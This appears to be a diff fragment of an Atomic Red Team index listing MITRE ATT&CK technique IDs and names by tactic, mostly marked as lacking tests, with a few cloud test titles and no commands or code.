+- T1553.006 Subvert Trust Controls: Code Signing Policy Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1112 Modify Registry [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1574.008 Hijack Execution Flow: Path Interception by Search Order Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1027.001 Obfuscated Files or Information: Binary Padding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1484.001 Domain Policy Modification: Group Policy Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078.001 Valid Accounts: Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1070.001 Indicator Removal on Host: Clear Windows Event Logs [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1222 File and Directory Permissions Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1548 Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1548.005 Temporary Elevated Cloud Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1578.003 Delete Cloud Instance [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1562.007 Disable or Modify Cloud Firewall [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1134.002 Create Process with Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1218.008 Signed Binary Proxy Execution: Odbcconf [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1055.013 Process Doppelgänging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1574.005 Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1562.006 Impair Defenses: Indicator Blocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1036.002 Right-to-Left Override [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1542.002 Component Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1070 Indicator Removal on Host [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1550.003 Use Alternate Authentication Material: Pass the Ticket [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1036.004 Masquerading: Masquerade Task or Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1055.004 Process Injection: Asynchronous Procedure Call [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1553.005 Subvert Trust Controls: Mark-of-the-Web Bypass [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1542 Pre-OS Boot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1055.002 Process Injection: Portable Executable Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1218.012 Verclsid [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1562.010 Impair Defenses: Downgrade Attack [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1497 Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1218.005 Signed Binary Proxy Execution: Mshta [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1480 Execution Guardrails [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1134.001 Access Token Manipulation: Token Impersonation/Theft [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1205.001 Port Knocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1027.012 LNK Icon Smuggling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1564.002 Hide Artifacts: Hidden Users [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1134.003 Make and Impersonate Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1562.003 Impair Defenses: Impair Command History Logging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1556.008 Network Provider DLL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1497.002 User Activity Based Checks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1134.004 Access Token Manipulation: Parent PID Spoofing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1574.010 Services File Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1574.013 KernelCallbackTable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1218.001 Signed Binary Proxy Execution: Compiled HTML File [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1070.005 Indicator Removal on Host: Network Share Connection Removal [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1562.001 Impair Defenses: Disable or Modify Tools](../../T1562.001/T1562.001.md)
- Atomic Test #46: AWS - GuardDuty Suspension or Deletion [iaas:aws]
+- T1574 Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1027.005 Indicator Removal from Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078 Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1055.012 Process Injection: Process Hollowing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1027 Obfuscated Files or Information [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.006 Multi-Factor Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1550.004 Web Session Cookie [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1578.005 Modify Cloud Compute Configurations [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- [T1562.008 Impair Defenses: Disable Cloud Logs](../../T1562.008/T1562.008.md)
- - Atomic Test #1: AWS - CloudTrail Changes [iaas:aws]
- - Atomic Test #2: Azure - Eventhub Deletion [iaas:azure]
- - Atomic Test #4: AWS - Disable CloudTrail Logging Through Event Selectors using Stratus [linux, macos, iaas:aws]
- - Atomic Test #5: AWS - CloudTrail Logs Impairment Through S3 Lifecycle Rule using Stratus [linux, macos, iaas:aws]
- - Atomic Test #6: AWS - Remove VPC Flow Logs using Stratus [linux, macos, iaas:aws]
- - Atomic Test #7: AWS - CloudWatch Log Group Deletes [iaas:aws]
- - Atomic Test #8: AWS CloudWatch Log Stream Deletes [iaas:aws]
- - Atomic Test #10: GCP - Delete Activity Event Log [iaas:gcp]
-- T1556.009 Conditional Access Policies [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1578.002 Create Cloud Instance [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1578.001 Create Snapshot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1550.001 Application Access Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- [T1078.004 Valid Accounts: Cloud Accounts](../../T1078.004/T1078.004.md)
- - Atomic Test #1: Creating GCP Service Account and Service Account Key [google-workspace, iaas:gcp]
- - Atomic Test #2: Azure Persistence Automation Runbook Created or Modified [iaas:azure]
- - Atomic Test #3: GCP - Create Custom IAM Role [iaas:gcp]
+- T1036.001 Invalid Code Signature [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1564.006 Run Virtual Instance [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1027.014 Polymorphic Code [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1134.005 Access Token Manipulation: SID-History Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1553 Subvert Trust Controls [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1218.010 Signed Binary Proxy Execution: Regsvr32 [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1036.003 Masquerading: Rename System Utilities [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1562.011 Spoof Security Alerting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1574.009 Hijack Execution Flow: Path Interception by Unquoted Path [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1027.003 Steganography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1218.009 Signed Binary Proxy Execution: Regsvcs/Regasm [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1553.004 Subvert Trust Controls: Install Root Certificate [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1027.004 Obfuscated Files or Information: Compile After Delivery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1564.007 VBA Stomping [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1197 BITS Jobs [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1127.001 Trusted Developer Utilities Proxy Execution: MSBuild [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1656 Impersonation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1564.003 Hide Artifacts: Hidden Window [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1127.002 ClickOnce [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1070.010 Relocate Malware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1070.009 Clear Persistence [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1036.010 Masquerade Account Name [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1556.001 Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1027.006 HTML Smuggling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1556.005 Reversible Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1027.010 Command Obfuscation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1070.004 Indicator Removal on Host: File Deletion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1221 Template Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1134 Access Token Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1027.002 Obfuscated Files or Information: Software Packing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1564.005 Hidden File System [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1055.005 Thread Local Storage [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1622 Debugger Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1550.002 Use Alternate Authentication Material: Pass the Hash [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1574.002 Hijack Execution Flow: DLL Side-Loading [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1216.002 SyncAppvPublishingServer [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1027.007 Obfuscated Files or Information: Dynamic API Resolution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1055.015 Process Injection: ListPlanting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1484 Domain or Tenant Policy Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1220 XSL Script Processing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1564.001 Hide Artifacts: Hidden Files and Directories [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1480.001 Environmental Keying [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1564.004 Hide Artifacts: NTFS File Attributes [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1055.001 Process Injection: Dynamic-link Library Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1216 Signed Script Proxy Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1078.003 Valid Accounts: Local Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1211 Exploitation for Defense Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1127 Trusted Developer Utilities Proxy Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1218.014 MMC [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1564.010 Process Argument Spoofing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1574.012 Hijack Execution Flow: COR_PROFILER [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+
+# privilege-escalation
+- T1055.011 Process Injection: Extra Window Memory Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1053.005 Scheduled Task/Job: Scheduled Task [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1037 Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1574.007 Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1546.013 Event Triggered Execution: PowerShell Profile [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1543 Create or Modify System Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1574.011 Hijack Execution Flow: Services Registry Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1547 Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1547.014 Active Setup [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1484.002 Domain Trust Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1543.003 Create or Modify System Process: Windows Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1547.012 Boot or Logon Autostart Execution: Print Processors [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1574.001 Hijack Execution Flow: DLL Search Order Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1574.014 AppDomainManager [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1053 Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1098.007 Additional Local or Domain Groups [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1055.003 Thread Execution Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1546.011 Event Triggered Execution: Application Shimming [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1547.010 Boot or Logon Autostart Execution: Port Monitors [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1055 Process Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1611 Escape to Host [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1547.009 Boot or Logon Autostart Execution: Shortcut Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1547.005 Boot or Logon Autostart Execution: Security Support Provider [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1574.008 Hijack Execution Flow: Path Interception by Search Order Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1484.001 Domain Policy Modification: Group Policy Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1078.001 Valid Accounts: Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1547.003 Time Providers [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1548 Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1134.002 Create Process with Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1547.004 Boot or Logon Autostart Execution: Winlogon Helper DLL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1546.012 Event Triggered Execution: Image File Execution Options Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1055.013 Process Doppelgänging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1574.005 Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1546.008 Event Triggered Execution: Accessibility Features [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1055.004 Process Injection: Asynchronous Procedure Call [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1546.009 Event Triggered Execution: AppCert DLLs [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1098.005 Device Registration [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1055.002 Process Injection: Portable Executable Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1134.001 Access Token Manipulation: Token Impersonation/Theft [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1134.003 Make and Impersonate Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1546.003 Event Triggered Execution: Windows Management Instrumentation Event Subscription [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1134.004 Access Token Manipulation: Parent PID Spoofing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1546.001 Event Triggered Execution: Change Default File Association [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1574.010 Services File Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- [T1098 Account Manipulation](../../T1098/T1098.md)
+ - Atomic Test #3: AWS - Create a group and add a user to that group [iaas:aws]
+ - Atomic Test #6: Azure - adding user to Azure role in subscription [iaas:azure]
+ - Atomic Test #7: Azure - adding service principal to Azure role in subscription [iaas:azure]
+ - Atomic Test #17: GCP - Delete Service Account Key [iaas:gcp]
+- T1574.013 KernelCallbackTable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1574 Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1078 Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1055.012 Process Injection: Process Hollowing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1068 Exploitation for Privilege Escalation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1546 Event Triggered Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1134.005 Access Token Manipulation: SID-History Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1547.002 Authentication Package [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1546.015 Event Triggered Execution: Component Object Model Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1574.009 Hijack Execution Flow: Path Interception by Unquoted Path [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1037.003 Network Logon Script [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1546.010 Event Triggered Execution: AppInit DLLs [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1546.002 Event Triggered Execution: Screensaver [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1546.016 Installer Packages [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1134 Access Token Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1055.005 Thread Local Storage [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1574.002 Hijack Execution Flow: DLL Side-Loading [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1098.002 Account Manipulation: Additional Email Delegate Permissions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1037.001 Boot or Logon Initialization Scripts: Logon Script (Windows) [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1055.015 Process Injection: ListPlanting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1484 Domain or Tenant Policy Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1547.008 Boot or Logon Autostart Execution: LSASS Driver [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1053.002 Scheduled Task/Job: At [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1055.001 Process Injection: Dynamic-link Library Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1546.007 Event Triggered Execution: Netsh Helper DLL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1078.003 Valid Accounts: Local Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1574.012 Hijack Execution Flow: COR_PROFILER [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+
+# execution
+- T1053.005 Scheduled Task/Job: Scheduled Task [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1047 Windows Management Instrumentation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1129 Server Software Component [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1059.007 Command and Scripting Interpreter: JavaScript [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1559.002 Inter-Process Communication: Dynamic Data Exchange [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1204.002 User Execution: Malicious File [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1559.001 Component Object Model [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1053 Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1106 Native API [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1059.010 AutoHotKey & AutoIT [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1059 Command and Scripting Interpreter [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1204 User Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1072 Software Deployment Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1059.001 Command and Scripting Interpreter: PowerShell [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1559 Inter-Process Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1059.011 Lua [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1203 Exploitation for Client Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1059.006 Command and Scripting Interpreter: Python [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1569 System Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1059.003 Command and Scripting Interpreter: Windows Command Shell [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1059.005 Command and Scripting Interpreter: Visual Basic [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1204.001 Malicious Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1569.002 System Services: Service Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1053.002 Scheduled Task/Job: At [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+
+# persistence
+- T1053.005 Scheduled Task/Job: Scheduled Task [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1205.002 Socket Filters [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1037 Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1574.007 Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
